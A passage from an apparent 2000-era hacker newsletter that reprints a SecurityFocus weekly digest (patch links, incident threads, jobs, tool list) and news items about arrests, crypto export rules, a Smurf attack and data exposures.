ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z
2. Vendor: Microsoft
Product: Index Server for Windows NT and 2000
Vulnerability Patched: NT Index Server Directory Traversal
Bugtraq ID: 950
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/950
Patch Locations:
Index Server 2.0:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
3. Vendor: OpenBSD
Product: OpenBSD
Vulnerability Patched: Multiple Vendor BSD /proc File Sytem
Bugtraq ID: 940
Relevant URLS:
http://www.openbsd.org/errata.html
http://www.securityfocus.com/bid/940
Patch Location:
http://www.openbsd.org/errata.html#procfs
4. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD /proc File Sytem
Bugtraq ID: 940
Relevant URLS:
http://www.freebsd.org/security/
http://www.securityfocus.com/bid/940
Patch Location:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch
5. Vendor: Inter7
Product: vpopmail
Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow
Bugtraq ID: 942
Relevant URLS:
http://www.inter7.com/
http://www.securityfocus.com/bid/942
Patch Location:
http://www.inter7.com/vpopmail/ (version 3.1.11e)
6. Vendor: Microsoft
Product: NT 4.0 Terminal Server Edition
Vulnerability Patched: NT RDISK Registry Enumeration File
Bugtraq ID: 947
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/947
Patch Location:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384
7. Vendor: Microsoft
Product: Office (All versions, including word and powerpoint)
Vulnerability Patched: Microsoft East Asian Word Conversion
Bugtraq ID: 946
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/946
Patch Locations:
- Word 97 or 98, PowerPoint 98: -
US:
http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm
Japan:
http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm
Korea:
http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm
China:
http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm
Taiwan:
http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm
Hong Kong:
http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm
- Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000, PowerPoint
2000: -
US:
http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm
Japan:
http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm
Korea:
http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm
China:
http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm
Taiwan:
http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm
Hong Kong:
http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm
8. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition
Bugtraq ID: 939
Relevant URLS:
http://www.freebsd.org/security
http://www.securityfocus.com/bid/939
Patch locations:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch
IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
-----------------------------------------
1. Outpost Leaves Data Unguarded (Mon Jan 24 2000)
Excerpt:
While James Wynne was checking his online order Friday at Outpost.com, he
noticed something curious -- he could check orders from other people, too.
Relevant URL:
http://www.wired.com/news/technology/0,1282,33842,00.html
2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000)
Excerpt:
Japan said on Tuesday it will seek help from the United States in an
investigation into hackers who penetrated two government Web sites.
Relevant URL:
http://news.excite.com/news/r/000125/00/net-japan-hackers
3. Task Force Battles Online Criminals (Wed Jan 26 2000)
Excerpt:
Ground zero in California's war against Internet crime is behind a
dumpster hard by a hamburger stand in a faded Sacramento County welfare
building. This is the headquarters of the Sacramento Valley high-tech
task force, a multi-agency law enforcement team dedicated to tracking down
e-crime, from stock swindlers to child pornographers.
Relevant URL:
http://www.latimes.com/news/asection/20000126/t000008196.html
4. Smart card 'inventor' lands in jail (Thu Jan 27 2000)
Excerpt:
In another case destined to fuel e-commerce anxieties, a Parisian computer
programmer is facing counterfeiting and fraud charges after developing a
homemade "smart card" that he says gave him the ability to fraudulently
purchase goods and services throughout France.
Relevant URL:
http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop
5. Visa acknowledges cracker break-ins (Fri Jan 28 2000)
Excerpt:
Visa International Inc. acknowledged this week that computer crackers
broke into several servers in its global network last July and stole
information. The company said that in December, it received a phone call
and an e-mail demanding money in exchange for the data.
Relevant URL:
http://www.computerworld.com/home/print.nsf/all/000128e45a
6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000)
Excerpt:
In its review of the last 12 months, Sophos, the IT security firm, says
that 1999 turned out to be a year when mass-mailed viruses arrived and
dominated the scene.
The annual review says that virus writers are now taking advantage of the
Internet and corporate e-mail systems to distribute their creations more
quickly.
Relevant URL:
http://www.currents.net/newstoday/00/01/28/news8.html
V. INCIDENTS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------
1. Got scanned again (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro
2. Unusual scan pattern (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss
3. Possible Probe = Possible Malfunction (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com
4. No Idea (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu
5. PC Anywhere client seems to probe class C of connected networks (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com
6. unapproved AXFR (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss
7. Connect thru PIX & ports 1727, 2209, 9200 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com
8. Anti-Death Penalty (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain
9. Strange DNS/TCP activity (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com
10. eri? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu
11. source port 321 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com
12. Korea (again) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net
13. BOGUS.IvCD File (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com
14. port 768 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz
15. Extrange named messages (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti
16. Probes to tcp 2766 ('System V Listner') (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org
17. Possible attempt at hacking? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au
18. DNS update queries: another sort of suspicious activity. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg
VI. VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30
----------------------------------------------------------
1. Shadow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu
2. things to break.. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com
3. HTTP scanners? (summary, long) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com
4. CGI insecurities (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net
5. ICQ Pass Cracker. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au
6. File Share Vacuum (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no
7. IIS4.0 .htw vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com
8. Napster a little insecure? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br
9. distributed.net and seti@home (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net
VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------------
Seeking Employment:
1. Prashant Vijay (Summer Internship) <vijay@eecs.tulane.edu>
Resume at:
http://www.securityfocus.com/templates/archive.pike?list=77&msg=NDBBJEJEALCFECNEOEHPMEKBCAAA.vijay@eecs.tulane.edu&part=.1
Seeking Staff:
1. Security Research Engineer (Atlanta, Ga)
Reply to: Samuel Cure <scure@iss.net>
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000124212259.7741.qmail@securityfocus.com
2. Practice Manager w/PKI experience NYC, Philly or DC)
Reply to: Erik Voss <evoss@mrsaratoga.com>
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=00d201bf6832$f9cd5460$6775010a@saratoga3
3. Lead Security Engineer - Bay Area/San Jose
Reply to: Sanjeev Kumar <sakumar@zambeel.com>
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127015859.1308.qmail@securityfocus.com
4. Senior security engineers - Bay Area/San Jose
Reply to: Erik Voss <evoss@mrsaratoga.com>
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127020135.1478.qmail@securityfocus.com
5. Virus coder wanted (San Antonio, TX)
Reply to: Drissel, James W. <james.drissel@cmet.af.mil>
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil
6. Junior Security Engineers Needed (Maryland)
Reply to: Brian Mitchell <bmitchell@icscorp.com>
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=NCBBKIMIMKKMLDMGEHFKAEAKENAA.bmitchell@icscorp.com
VIII. SECURITY SURVEY 2000-01-24 to 2000-01-30
----------------------------------------------
Our current month long survey is:
"Do you think security vendors exaggerate the importance of security
issues as a marketing strategy?"
Never 6% / 10 votes
Rarely 30% / 48 votes
Often 47% / 74 votes
Always 14% / 23 votes
Total number of votes: 155 votes
IX. SECURITY FOCUS TOP 6 TOOLS 2000-01-24 to 2000-01-30
--------------------------------------------------------
1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
by RedShadow
Relevant URL:
http://www.rsh.kiev.ua
Shadow Advantis Administator Tools - Ping (SSPing), Port Scanner, , IP
Scanner, Site Info (is intended for fast definition of services started on
the host), Network Port Scanner,Tracert, Telnet,Nslookup,
Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt,
Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info
Shadow Hack and Crack - WinNuke, Mail Bomber,POP3,HTTP,SOCKS,FTP Crack
(definitions of the password by a method of search),Unix password Crack,
Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files
ShadowPortGuard - code for detection of connection on the certain port
Shadow Novell NetWare Crack - code for breakings Novell NetWare 4.x And
more other functions
2. SecurityFocus.com Pager (Win95/98/NT)
by SecurityFocus.com
Relevant URL:
http://www.securityfocus.com/pager/sf_pgr20.zip
This program allows the user to monitor additions to the Security Focus
website without constantly maintaining an open browser. Sitting quietly in
the background, it polls the website at a user-specified interval and
alerts the user via a blinking icon in the system tray, a popup message or
both (also user-configurable).
3. lidentd 1.0p1 (Linux)
by Drago, drago@drago.com
Relevant URL:
http://www.securityfocus.com/data/tools/lidentd-v1.0p1.tgz
lidentd is an identd replacement with many features including fake users,
random fake users , restricted fake user responses, matching against the
passwd file for fake responses and more.
4. Cgi Sonar 1.0 (any system supporting perl)
by M.e.s.s.i.a.h
Relevant URL:
http://www.securityfocus.com/data/tools/CgiSonar.pl.gz
5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux,
NetBSD, OpenBSD, Solaris and SunOS)
by Craig Rowland, crowland@psionic.com
Relevant URL:
http://www.securityfocus.com/data/tools/logcheck-1.1.1.tar.gz
Logcheck is part of the Abacus Project of security tools. It is a program
created to help in the processing of UNIX system logfiles generated by the
various Abacus Project tools, system daemons, Wietse Venema's TCP Wrapper
and Log Daemon packages, and the Firewall Toolkit) by Trusted Information
Systems Inc.(TIS). Logcheck also works very well at reporting on other
common operating system security violations and strange events.
6. Secret Sharer 1.0 1.0 (Windows 95/98)
by Joel McNamara, joelm@eskimo.com
Relevant URL:
http://www.securityfocus.com/data/tools/secs.zip
Secret Sharer is designed to help people keep secure back-up copies of
sensitive data such as PGP (or other cryptosystem) passphrases and
confidential files.
X. SPONSOR INFORMATION - CORE SDI
------------------------------------------
CORE SDI is an international computer security research and development
company. It's clients include 3 of the Big 5 chartered accountant firms
for whom CORE SDI develops customized security auditing tools as well as
several notable computer security product vendors, such as Network
Associates. In addition to providing 'consultant to the consultant'
services CORE also performs risk assesment and security infrastructure
consulting for a large number of government and fortune 500 companies in
both North and Latin America.
URL: http://www.core-sdi.com
XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have
to anwser.
2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
address with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I
will manualy remove you.
3. How do I disable mail delivery temporarily?
If you will are simply going in vacation you can turn off mail delivery
without unsubscribing by sending LISTSERV the command:
SET SF-NEWS NOMAIL
To turn back on e-mail delivery use the command:
SET SF-NEWS MAIL
4. Is the list available in a digest format?
Yes. The digest generated once a day.
5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1)
and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message
body of:
SET SF-NEWS DIGEST
6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body
of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the
instructions of section 0.2.2 next.
7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than that from
which you are sending commands to LISTSERV from. Either send email from
the appropiate address or email the moderator to be unsubscribed manually.
@HWA
35.0 HNN: Jan 17: NY Student Arrested After Damaging School Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
A high school student in Long Island New York has been
arrested for electronically breaking into his schools
computer system. He has been charged with computer
tampering and unauthorized use of a computer. Police
say that he was caught after bragging about the
intrusion to friends and teachers. Damage was
estimated at $3,000.
WABC News
http://abcnews.go.com/local/wabc/news/32275_1142000.html
High School Hacker Arrested
Long Island authorities have arrested a 17-year-old high school student
for hacking into his school district's computer.
Suffolk County authorities are charging Keith Billig with computer tampering
and unauthorized use of a computer. Billig's is a student at Hauppauge High
School.
On Wednesday, authorities say Billig gained access to the school district's
main frame computer. He allegedly was able to attain the password of every
administrator, teacher and student in the district.
The computer's internal security system was able to detect Billig's intrusion
in the early stages. Police say Billig's bragging about his exploits to
teachers and other students is what led them to him. Authorities are not sure
what Billig's motive for breaking into the computer system was.
Authorities estimate the damage done to the school district's computer system
at $3,000.
@HWA
Where do these guys get these figures from? any sysadmin worth his salt can
secure the system in less than an hour... do they get paid $3k/hr down there??
- Ed
36.0 HNN: Jan 17: NSA Wants A Secure Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Benjamin
The NSA has contracted Secure Computing as a sole
source provider for a new Linux based secure OS.
Secure Computing will integrate its patented Type
Enforcement technology they use for the Sidewinder
firewall at the OS level. The technology is scheduled to
be made available to the public as well as the NSA.
PR Newswire - via Yahoo
http://biz.yahoo.com/prnews/000113/ca_secure__1.html
Thursday January 13, 8:02 am Eastern Time
Company Press Release
SOURCE: Secure Computing Corporation
National Security Agency Selects Secure Computing to Provide Type
Enforcement(TM) on Linux OS
Secure Computing First to Develop Strong Security Platform for Linux
SAN JOSE, Calif., Jan. 13 /PRNewswire/ -- Secure Computing Corporation
(Nasdaq: SCUR - news), today announced that it has been awarded a sole
source contract by the National Security Agency (NSA) to develop a Secure
Linux Operating System (OS). This contract calls for Secure
Computing to apply its patented Type Enforcement(TM) technology, to
develop a robust and secure Linux platform. This award furthers the goal
of Secure to pursue and acquire contracts that will provide enabling
technologies to both the Federal government infrastructure as well as
commercial electronic business applications.
The NSA is the nation's high-technology cryptologic organization that
ensures important and sensitive activities in the US intelligence
community are protected from exploitation through interception,
unauthorized access, or related technical intelligence threats.
Secure Computing's patented Type Enforcement technology provides network
security protection that is unique to the industry. This technology, first
developed under previous government contracts, is available today as part
of the UNIX OS for Secure Computing's Sidewinder(TM) firewall. Type
Enforcement secures underlying operating systems and protects applications
and network services, by segmenting them into domains. Each domain is
granted permission to access only specific file types, including
executables. As such, each domain provides a self-contained, discrete
layer of protection that cannot be altered. Implementing Type Enforcement
within the operating system itself assures the highest level of security
available in commercial operating systems.
``The NSA has been a long standing customer and partner of Secure
Computing,'' said Chris Filo, vice president and general manager of the
Advanced Technology Division at Secure Computing. ``Working with the NSA
allows Secure to continue to advance the state of the art in
security technologies that is required to enable safe, secure operating
environments within the Department of Defense (DoD), while at the same
time, providing the basis for our future commercial products.''
Linux is a UNIX-type operating system that includes true multitasking,
virtual memory, shared libraries, demand loading, proper memory
management, TCP/IP networking, and other features consistent with
Unix-type systems. The Linux source code is freely available to
everyone.
About the National Security Agency
The National Security Agency (NSA) is the nation's cryptologic
organization, tasked with making and breaking codes and ciphers. NSA is a
high-technology organization, working on the very frontiers of
communications and data processing. The expertise and knowledge it
develops provide the government with systems that deny foreign powers
knowledge of US capabilities and intentions.
The NSA is charged with two of the most important and sensitive activities
in the US intelligence community. The information systems security or
INFOSEC mission provides leadership, products, and services to protect
classified and unclassified national security systems against
exploitation through interception, unauthorized access, or related
technical intelligence threats. The second activity is the foreign signals
intelligence or SIGINT mission, which allows for an effective, unified
organization and control of all the foreign signals collection and
processing activities of the United States.
About Secure Computing
Headquartered in San Jose, California, Secure Computing Corporation is a
global leader in providing safe, secure extranets for e-business. Secure
Computing solutions provide authentication, authorization and secure
network access. Secure Computing's worldwide partners and customer
base are counted among the Fortune 50 in financial services, healthcare,
telecom, communications, manufacturing, technology and Internet service
providers, as well as some of the largest agencies of the United States
government.
For more information, visit Secure Computing Corporation at
www.securecomputing.com, or by calling: in Europe, 44-1753-826000; in
Asia/Pacific, 61-2-9844-5440, in the U.S., 800-379-4944, or 408-918-6100.
NOTE: All trademarks, tradenames or service marks used or mentioned herein
belong to their respective owners.
This press release contains forward-looking statements relating to the
anticipated delivery of Secure Computing's Type Enforcement technology on
the Linux operating system and the expected benefits of such technology,
and such statements involve a number of risks and uncertainties.
Among the important factors that could cause actual results to differ
materially from those indicated by such forward-looking statements are
delays in product development, competitive pressures, technical
difficulties, changes in
customer requirements, general economic conditions and the risk factors
detailed from time to time in Secure Computing's periodic reports and
registration statements filed with the Securities and Exchange Commission.
SOURCE: Secure Computing Corporation
@HWA
37.0 HNN: Jan 17: Cryptome may be breaking the law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Cryptom May Be Violating the Law
contributed by White Vampire
Leading Internet civil liberties groups said today that
new encryption export regulations released by the U.S.
Commerce Department fall short of the Clinton
Administration's promise to deregulate the
privacy-enhancing technology. One example of this
concerns the popular Internet site Cryptom where PGP
is made freely available to anyone in the world who
wants it. It is unclear with the new regulations whether
this is a criminal act or not.
Wired
http://www.wired.com/news/politics/0,1283,33672,00.html
Is This Man a Crypto Criminal? by Declan McCullagh
3:00 a.m. 15.Jan.2000 PST Crypto maven John Young has a problem.
He may be a felon, guilty of a federal crime punishable by years in
prison. Or he may not be. He'd just like to know one way or another.
The 63-year-old architect and owner of the popular Cryptome site has
posted a copy of PGP (Pretty Good Privacy) encryption software for the
world to download.
Also: He Digs 'Through' Gov't Muck More Infostructure in Wired News Read
more Politics -- from Wired News
PGP, an encryption program that lets users scramble files and email, has
become one of the most popular crypto applications online. But people
living outside the US have not been able to get it legally from a US Web
site.
Young's seemingly innocuous act might violate new US government
regulations that restrict placing privacy-protecting crypto programs on
the Web. Therein lies the uncertainty. The rules are much less onerous
than the previous version, but they still apply.
And they're so labyrinthine and convoluted that even lawyers who
specialize in the area declined to guess whether or not Young has run
afoul of President Clinton's executive order and Commerce Department
regulations.
"The fact that questions still remain about what does and does not violate
the law demonstrates that these regulations continue to cloud the
situation," said David Sobel, general counsel of the Electronic Privacy
Information Center.
So Young decided to be intrepid -- and perhaps risk a confrontation with
the Feds.
"If it's not right, someone will tell me. If I go to a lawyer to ask,
they'll advise caution. Every time I go to a lawyer they advise me not to
do it, so I don't go any more," he said.
The Department of Commerce, which published the regulations and is in
charge of arresting crypto-miscreants, declined to comment. Eugene
Cottilli, a spokesman for the Commerce's bureau of export administration,
could not secure an official response from government lawyers on
Friday.
Complicating matters is the different way that the regulations treat
ready-to-use binary software, and the human-readable source code that must
be compiled to be used.
On Friday, Young posted a copy of PGP Freeware Version 6.5.2a for Windows
and Macintosh, which contains binary code. The regulations appear to say
that Americans can only distribute it online if the government has
previously "reviewed and classified" the software as acceptable for
distribution.
Under the old rules, Web sites could distribute binary code only if they
checked the Internet address of the recipient and attempted to verify that
it was a computer inside the US.
MIT, which makes PGP available, has a system that does just that. But
Young's site doesn't include the foreigner-verification check, and he said
overseas visitors have already been downloading the software.
The uncertainty -- and possibility of criminal prosecution -- doesn't faze
Young. "People are saying the regs are deliberately vague so you'll censor
yourself, so I tend to go the other way," he said. "I'm hoping this will
lead to clarification."
Source code, on the other hand, is a bit freer. As long as it's not
subject to an onerous license and as long as you email the site's address
to the Commerce Department, Web posting appears to be permitted.
Some cryptographers have already done just that.
"I'm willing to give it a try," wrote cryptographer Wei Dai on an
encryption mailing list. "I sent an email to BXA [Bureau of Export
Administration] and got no reply. The rules do not say I need permission,
just notification, so Crypto++ is now available for unrestricted
download." Dai maintains the Crypto++ library of C++ encryption routines,
including authentication programs and ciphers.
Soon after, the text of the Electronic Frontier Foundation's Cracking DES
book appeared online. http://www.shmoo.com/crypto/Cracking_DES
@HWA
38.0 HNN: Jan 21: H4g1s Member Sentenced to Six Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by extension
Jason Mewhiney, the Canadian who defaced a NASA
web page back in 1997, has been sentenced to 6
months in prison and ordered to pay a $6000 fine.
Mewhiney pleaded guilty to 12 of the 51 charges
against him, including committing mischief to data
stored and fraudulent use of a NASA computer system.
NASA estimated the damages caused by the intrusion at
$70,000. (And how much did it cost to prosecute the
case?)
Canadian Press - via Yahoo
http://ca.dailynews.yahoo.com/ca/headlines/cpress/tc/story.html?s=v/ca/cpress/20000118/tc/technology_461022_1.html
Monday January 17 11:48 PM ET
Man sentenced to six months in jail after pleading guilty to computer
hacking
SUDBURY, Ont. (CP) - A man was sentenced to six months in jail and fined
$6,000 Monday after pleading guilty to computer hacking related charges,
including altering NASA's Web site.
Jason Mewhiney, 22, went into the space agency's Web site March 5, 1997,
leaving a message that called for an end to the commercialization of the
Internet and freedom for two hackers in jail for computer crimes.
Justice John Poupore compared Mewhiney's actions to that of a
"safecracker" trying to steal money from a bank.
"Mr. Mewhiney, you ought not to leave this courtroom with a badge of
honour in the computer community," the judge said Monday.
"You sir, are a convicted criminal. That is a distinction you will carry
with you for the rest of your life. It is nothing to be proud of."
Mewhiney, of Val Caron, outside of Sudbury, pleaded guilty to 12 of the 51
charges he was facing, including committing mischief to data stored and
fraudulent use of a NASA computer system.
He was able to access dozens of computer systems by using programs that
crack password codes. The space agency's home page was put briefly out of
service for repair, at an estimated cost of $70,000.
NASA and FBI computer crime teams caught Mewhiney by tracing his
movements.
Mewhiney told the court he was sorry.
"I'd just like to say I'm sorry and I'm sorry for everyone's time I've
wasted," he said.
RCMP searched his parent's home in the spring of 1998 and found a paper
with numerous computer system passwords on them.
The judge agreed to a request by assistant Crown attorney Patricia Moore
that Mewhiney's computer and other papers seized by police be confiscated.
One of his probation conditions was that he not possess a computer.
(Sudbury Star) © The Canadian Press, 2000
@HWA
39.0 HNN: Jan 21: Smurf Attack Felt Across the Country
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Dark Knight
A small ISP in Seattle WA, Oz.net, suffered a major
Smurf attack last weekend that was felt across the
country. The denial of service attack is estimated to
have been launched from 2000 systems nationwide.
70% of the traffic in the Washington State area was
said to have been effected.
MSNBC
http://www.msnbc.com/local/KING/483728.asp
404 my dr00gies, sorry article unavailable...
@HWA
40.0 HNN: Jan 21: CIHost.com Leaves Customer Info On the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
CIHost.com, a web hosting company based in Texas,
left over 1500 customer records available on the
internet for anyone with a web browser to read. CIHost
said that the database had been moved to a server so
an outside developer could have access to the
information and by mistake password protection was
omitted. The customer records included information
such as name, credit card type, credit card number, and
the amount charged.
MSNBC
http://www.msnbc.com/news/360102.asp
(fuck MSSNBC and their bullshit page design)
@HWA
41.0 HNN: Jan 21:False Bids Submitted, Hackers Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
False bids on an online auction for a dinosaur skeleton
have been blamed on 'hackers'. False bids of up to $15
million where submitted by people with names such as
'stevebert' and 'dumbass507'. The bidding procedure has
been revamped to prevent this from occurring again
however no details where given as to exactly what
security measures where put in place. (It is amzing how
many different definitions of the word 'hacker' exist)
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_608000/608634.stm
Tuesday, 18 January, 2000, 17:52 GMT Hackers attack dinosaur auction
Dinosaur hunters with their quarry: Alan Detrich (left) and Fred Nuss
By BBC News Online's Damian Carrington
An online auction for a complete Tyrannosaurus rex skeleton was attacked
by malicious hackers on Tuesday who filed 17 false bids.
At least six of these made it through security measures specifically put
in place to prevent such action.
"Some people found a way around that process and they have been removed,"
confirmed Brian Payea, public relations manager for Lycos.
He told BBC News Online: "There are no valid bids so far."
Bank chat
The first attempt to auction the 11-metre fossil dinosaur on eBay was
scuppered by prank bids of up to $8m. However, this time, the new
auctioneers Lycos Auction had teamed up with the website millionaire.com
to try to verify the wealth of bidders before they made their offer.
Mr Payea described what should have happened: "You fill in a form, that
is sent to millionaire.com and they review it and have a conversation
with your bank. The approval is given and someone can bid."
However, hackers named "mrmanson20", "stevebert" and "dumbass507" found a
hole and posted bids of up to $15m, well over the reserve price of $5.8m.
No credit compromise
Mr Payea declined to give details of what happened: "How the whole
process works is proprietary and I'm not going into detail about it. But
we are very confident it couldn't be done again."
He added that: "The hiccup does not compromise anybody's credit
information - that is all encrypted and very secure."
The auction opened on Monday but Mr Payea was not concerned that no
verified bids had yet been received: "It takes at least 24 hours for the
approval process to be completed. In any case, I think it will take
people a little while to commit to that kind of purchase - if it was me,
